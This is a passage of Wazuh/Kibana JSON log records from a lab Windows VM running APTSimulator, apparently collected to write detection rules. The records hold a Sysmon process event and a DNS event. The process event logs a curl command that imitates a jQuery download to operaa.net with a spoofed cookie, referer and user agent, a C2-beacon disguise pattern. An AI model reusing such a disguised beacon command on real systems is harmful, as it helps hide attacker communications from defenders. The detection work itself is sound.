"commandLine": "\\\"C:\\\\Users\\\\vagrant\\\\simulator\\\\APTSimulator\\\\\\\\helpers\\\\curl.exe\\\" -s -o /dev/null -I -H \\\"Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\\\" -H \\\"Cache-Control: no-cache\\\" -H \\\"Connection: Keep-Alive\\\" -H \\\"Cookie: __cfduid=gjlAuOSb_vHdOfQwz0K2WU4g6D-a0pERCS6QV0Gur6nvsxFX0hRL7RxeK61hsQgk1uGySuIQxIDU364bLV9YRYQZxgxtkoYBqk2CBlJlqc_gSIm5fxgkUBdLttW19M0Pn7szdQMCLKKbUzAB9QRyG5W0OrUDroCUECuOf3HgwMU\\\" -H \\\"Referer: http://code.jquery.com/\\\" -A \\\"Mozilla/5.0 (Windows NT 5.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2832.7 Safari/537.36\\\" https://operaa.net:443/jquery-3.2.2.min.js",
"integrityLevel": "High",
"user": "DESKTOP-VAEP8K1\\\\vagrant",
"terminalSessionId": "1",
"parentUser": "DESKTOP-VAEP8K1\\\\vagrant"
},
"system": {
"eventID": "1",
"keywords": "0x8000000000000000",
"providerGuid": "{5770385f-c22a-43e0-bf4c-06f5698ffbd9}",
"level": "4",
"channel": "Microsoft-Windows-Sysmon/Operational",
"opcode": "0",
"message": "\"Process Create:\r\nRuleName: technique_id=T1059,technique_name=Command-Line Interface\r\nUtcTime: 2022-04-20 12:08:36.397\r\nProcessGuid: {c64152da-f7c4-625f-fb05-000000000c00}\r\nProcessId: 4656\r\nImage: C:\\Users\\vagrant\\simulator\\APTSimulator\\helpers\\curl.exe\r\nFileVersion: -\r\nDescription: -\r\nProduct: -\r\nCompany: -\r\nOriginalFileName: -\r\nCommandLine: \"C:\\Users\\vagrant\\simulator\\APTSimulator\\\\helpers\\curl.exe\" -s -o /dev/null -I -H \"Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\" -H \"Cache-Control: no-cache\" -H \"Connection: Keep-Alive\" -H \"Cookie: __cfduid=gjlAuOSb_vHdOfQwz0K2WU4g6D-a0pERCS6QV0Gur6nvsxFX0hRL7RxeK61hsQgk1uGySuIQxIDU364bLV9YRYQZxgxtkoYBqk2CBlJlqc_gSIm5fxgkUBdLttW19M0Pn7szdQMCLKKbUzAB9QRyG5W0OrUDroCUECuOf3HgwMU\" -H \"Referer: http://code.jquery.com/\" -A \"Mozilla/5.0 (Windows NT 5.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2832.7 Safari/537.36\" https://operaa.net:443/jquery-3.2.2.min.js\r\nCurrentDirectory: C:\\Users\\vagrant\\simulator\\APTSimulator\\\r\nUser: DESKTOP-VAEP8K1\\vagrant\r\nLogonGuid: {c64152da-7fad-625e-acb1-050000000000}\r\nLogonId: 0x5B1AC\r\nTerminalSessionId: 1\r\nIntegrityLevel: High\r\nHashes: SHA1=C852A39B2BD53BE2F9CB35CF07D15D176795F47C,MD5=1673A392AAF4278D2084C224A08ABFF1,SHA256=92A112DEEA36D6D4D1BD265E2E4B200129DAB30AFE918115B77A92F68D38903D,IMPHASH=0B669CDDDC01A874708E074B055741F6\r\nParentProcessGuid: {c64152da-8ec8-625e-8a02-000000000c00}\r\nParentProcessId: 8976\r\nParentImage: C:\\Windows\\System32\\cmd.exe\r\nParentCommandLine: \"C:\\Windows\\system32\\cmd.exe\" \r\nParentUser: DESKTOP-VAEP8K1\\vagrant\"",
"version": "5",
"systemTime": "2022-04-20T12:08:36.4002847Z",
"eventRecordID": "5962",
"threadID": "5384",
"computer": "DESKTOP-VAEP8K1",
"task": "1",
"processID": "5964",
"severityValue": "INFORMATION",
"providerName": "Microsoft-Windows-Sysmon"
}
}
},
"decoder": {
"name": "windows_eventchannel"
},
"full_log": "{\"win\":{\"system\":{\"providerName\":\"Microsoft-Windows-Sysmon\",\"providerGuid\":\"{5770385f-c22a-43e0-bf4c-06f5698ffbd9}\",\"eventID\":\"1\",\"version\":\"5\",\"level\":\"4\",\"task\":\"1\",\"opcode\":\"0\",\"keywords\":\"0x8000000000000000\",\"systemTime\":\"2022-04-20T12:08:36.4002847Z\",\"eventRecordID\":\"5962\",\"processID\":\"5964\",\"threadID\":\"5384\",\"channel\":\"Microsoft-Windows-Sysmon/Operational\",\"computer\":\"DESKTOP-VAEP8K1\",\"severityValue\":\"INFORMATION\",\"message\":\"\\\"Process Create:\\r\\nRuleName: technique_id=T1059,technique_name=Command-Line Interface\\r\\nUtcTime: 2022-04-20 12:08:36.397\\r\\nProcessGuid: {c64152da-f7c4-625f-fb05-000000000c00}\\r\\nProcessId: 4656\\r\\nImage: C:\\\\Users\\\\vagrant\\\\simulator\\\\APTSimulator\\\\helpers\\\\curl.exe\\r\\nFileVersion: -\\r\\nDescription: -\\r\\nProduct: -\\r\\nCompany: -\\r\\nOriginalFileName: -\\r\\nCommandLine: \\\"C:\\\\Users\\\\vagrant\\\\simulator\\\\APTSimulator\\\\\\\\helpers\\\\curl.exe\\\" -s -o /dev/null -I -H \\\"Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\\\" -H \\\"Cache-Control: no-cache\\\" -H \\\"Connection: Keep-Alive\\\" -H \\\"Cookie: __cfduid=gjlAuOSb_vHdOfQwz0K2WU4g6D-a0pERCS6QV0Gur6nvsxFX0hRL7RxeK61hsQgk1uGySuIQxIDU364bLV9YRYQZxgxtkoYBqk2CBlJlqc_gSIm5fxgkUBdLttW19M0Pn7szdQMCLKKbUzAB9QRyG5W0OrUDroCUECuOf3HgwMU\\\" -H \\\"Referer: http://code.jquery.com/\\\" -A \\\"Mozilla/5.0 (Windows NT 5.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2832.7 Safari/537.36\\\" https://operaa.net:443/jquery-3.2.2.min.js\\r\\nCurrentDirectory: C:\\\\Users\\\\vagrant\\\\simulator\\\\APTSimulator\\\\\\r\\nUser: DESKTOP-VAEP8K1\\\\vagrant\\r\\nLogonGuid: {c64152da-7fad-625e-acb1-050000000000}\\r\\nLogonId: 0x5B1AC\\r\\nTerminalSessionId: 1\\r\\nIntegrityLevel: High\\r\\nHashes: SHA1=C852A39B2BD53BE2F9CB35CF07D15D176795F47C,MD5=1673A392AAF4278D2084C224A08ABFF1,SHA256=92A112DEEA36D6D4D1BD265E2E4B200129DAB30AFE918115B77A92F68D38903D,IMPHASH=0B669CDDDC01A874708E074B055741F6\\r\\nParentProcessGuid: {c64152da-8ec8-625e-8a02-000000000c00}\\r\\nParentProcessId: 8976\\r\\nParentImage: C:\\\\Windows\\\\System32\\\\cmd.exe\\r\\nParentCommandLine: \\\"C:\\\\Windows\\\\system32\\\\cmd.exe\\\" \\r\\nParentUser: DESKTOP-VAEP8K1\\\\vagrant\\\"\"},\"eventdata\":{\"ruleName\":\"technique_id=T1059,technique_name=Command-Line Interface\",\"utcTime\":\"2022-04-20 12:08:36.397\",\"processGuid\":\"{c64152da-f7c4-625f-fb05-000000000c00}\",\"processId\":\"4656\",\"image\":\"C:\\\\\\\\Users\\\\\\\\vagrant\\\\\\\\simulator\\\\\\\\APTSimulator\\\\\\\\helpers\\\\\\\\curl.exe\",\"commandLine\":\"\\\\\\\"C:\\\\\\\\Users\\\\\\\\vagrant\\\\\\\\simulator\\\\\\\\APTSimulator\\\\\\\\\\\\\\\\helpers\\\\\\\\curl.exe\\\\\\\" -s -o /dev/null -I -H \\\\\\\"Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\\\\\\\" -H \\\\\\\"Cache-Control: no-cache\\\\\\\" -H \\\\\\\"Connection: Keep-Alive\\\\\\\" -H \\\\\\\"Cookie: __cfduid=gjlAuOSb_vHdOfQwz0K2WU4g6D-a0pERCS6QV0Gur6nvsxFX0hRL7RxeK61hsQgk1uGySuIQxIDU364bLV9YRYQZxgxtkoYBqk2CBlJlqc_gSIm5fxgkUBdLttW19M0Pn7szdQMCLKKbUzAB9QRyG5W0OrUDroCUECuOf3HgwMU\\\\\\\" -H \\\\\\\"Referer: http://code.jquery.com/\\\\\\\" -A \\\\\\\"Mozilla/5.0 (Windows NT 5.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2832.7 Safari/537.36\\\\\\\" https://operaa.net:443/jquery-3.2.2.min.js\",\"currentDirectory\":\"C:\\\\\\\\Users\\\\\\\\vagrant\\\\\\\\simulator\\\\\\\\APTSimulator\\\\\\\\\",\"user\":\"DESKTOP-VAEP8K1\\\\\\\\vagrant\",\"logonGuid\":\"{c64152da-7fad-625e-acb1-050000000000}\",\"logonId\":\"0x5b1ac\",\"terminalSessionId\":\"1\",\"integrityLevel\":\"High\",\"hashes\":\"SHA1=C852A39B2BD53BE2F9CB35CF07D15D176795F47C,MD5=1673A392AAF4278D2084C224A08ABFF1,SHA256=92A112DEEA36D6D4D1BD265E2E4B200129DAB30AFE918115B77A92F68D38903D,IMPHASH=0B669CDDDC01A874708E074B055741F6\",\"parentProcessGuid\":\"{c64152da-8ec8-625e-8a02-000000000c00}\",\"parentProcessId\":\"8976\",\"parentImage\":\"C:\\\\\\\\Windows\\\\\\\\System32\\\\\\\\cmd.exe\",\"parentCommandLine\":\"\\\\\\\"C:\\\\\\\\Windows\\\\\\\\system32\\\\\\\\cmd.exe\\\\\\\"\",\"parentUser\":\"DESKTOP-VAEP8K1\\\\\\\\vagrant\"}}}",
"input": {
"type": "log"
},
"@timestamp": "2022-04-20T12:09:03.206Z",
"location": "EventChannel",
"id": "1650456543.1005103",
"timestamp": "2022-04-20T12:09:03.206+0000"
},
"fields": {
"@timestamp": [
"2022-04-20T12:09:03.206Z"
],
"timestamp": [
"2022-04-20T12:09:03.206Z"
]
},
"highlight": {
"agent.id": [
"@kibana-highlighted-field@001@/kibana-highlighted-field@"
]
},
"sort": [
1650456543206
]
}
DNS request by an unknown process
{
"_index": "wazuh-archives-4.x-2022.04.20",
"_type": "_doc",
"_id": "d13gRoABWZBNLY4mUsOi",
"_version": 1,
"_score": null,
"_source": {
"agent": {
"ip": "10.0.2.15",
"name": "DESKTOP-VAEP8K1",
"id": "001"
},
"manager": {
"name": "ubuntu-focal"
},
"data": {
"win": {
"eventdata": {
"image": "<unknown process>",
"processGuid": "{00000000-0000-0000-0000-000000000000}",
"queryStatus": "9003",
"processId": "4656",
"utcTime": "2022-04-20 12:08:14.567",
"queryName": "operaa.net",
"user": "DESKTOP-VAEP8K1\\\\vagrant"
},
"system": {
"eventID": "22",
"keywords": "0x8000000000000000",
"providerGuid": "{5770385f-c22a-43e0-bf4c-06f5698ffbd9}",
"level": "4",
"channel": "Microsoft-Windows-Sysmon/Operational",
"opcode": "0",
"message": "\"Dns query:\r\nRuleName: -\r\nUtcTime: 2022-04-20 12:08:14.567\r\nProcessGuid: {00000000-0000-0000-0000-000000000000}\r\nProcessId: 4656\r\nQueryName: operaa.net\r\nQueryStatus: 9003\r\nQueryResults: -\r\nImage: <unknown process>\r\nUser: DESKTOP-VAEP8K1\\vagrant\"",
"version": "5",
"systemTime": "2022-04-20T12:08:38.7490769Z",
"eventRecordID": "5965",
"threadID": "7544",
"computer": "DESKTOP-VAEP8K1",
"task": "22",
"processID": "5964",
"severityValue": "INFORMATION",
"providerName": "Microsoft-Windows-Sysmon"
}
}
},
"decoder": {
"name": "windows_eventchannel"
},
"full_log": "{\"win\":{\"system\":{\"providerName\":\"Microsoft-Windows-Sysmon\",\"providerGuid\":\"{5770385f-c22a-43e0-bf4c-06f5698ffbd9}\",\"eventID\":\"22\",\"version\":\"5\",\"level\":\"4\",\"task\":\"22\",\"opcode\":\"0\",\"keywords\":\"0x8000000000000000\",\"systemTime\":\"2022-04-20T12:08:38.7490769Z\",\"eventRecordID\":\"5965\",\"processID\":\"5964\",\"threadID\":\"7544\",\"channel\":\"Microsoft-Windows-Sysmon/Operational\",\"computer\":\"DESKTOP-VAEP8K1\",\"severityValue\":\"INFORMATION\",\"message\":\"\\\"Dns query:\\r\\nRuleName: -\\r\\nUtcTime: 2022-04-20 12:08:14.567\\r\\nProcessGuid: {00000000-0000-0000-0000-000000000000}\\r\\nProcessId: 4656\\r\\nQueryName: operaa.net\\r\\nQueryStatus: 9003\\r\\nQueryResults: -\\r\\nImage: <unknown process>\\r\\nUser: DESKTOP-VAEP8K1\\\\vagrant\\\"\"},\"eventdata\":{\"utcTime\":\"2022-04-20 12:08:14.567\",\"processGuid\":\"{00000000-0000-0000-0000-000000000000}\",\"processId\":\"4656\",\"queryName\":\"operaa.net\",\"queryStatus\":\"9003\",\"image\":\"<unknown process>\",\"user\":\"DESKTOP-VAEP8K1\\\\\\\\vagrant\"}}}",
"input": {
"type": "log"
},
"@timestamp": "2022-04-20T12:09:05.300Z",
"location": "EventChannel",
"id": "1650456545.1005103",
"timestamp": "2022-04-20T12:09:05.300+0000"
},
"fields": {
"@timestamp": [
"2022-04-20T12:09:05.300Z"
],
"timestamp": [
"2022-04-20T12:09:05.300Z"
]
},
"highlight": {
"agent.id": [
"@kibana-highlighted-field@001@/kibana-highlighted-field@"
]
},
"sort": [
1650456545300
]
}
MSSE-1337-server
Rules written.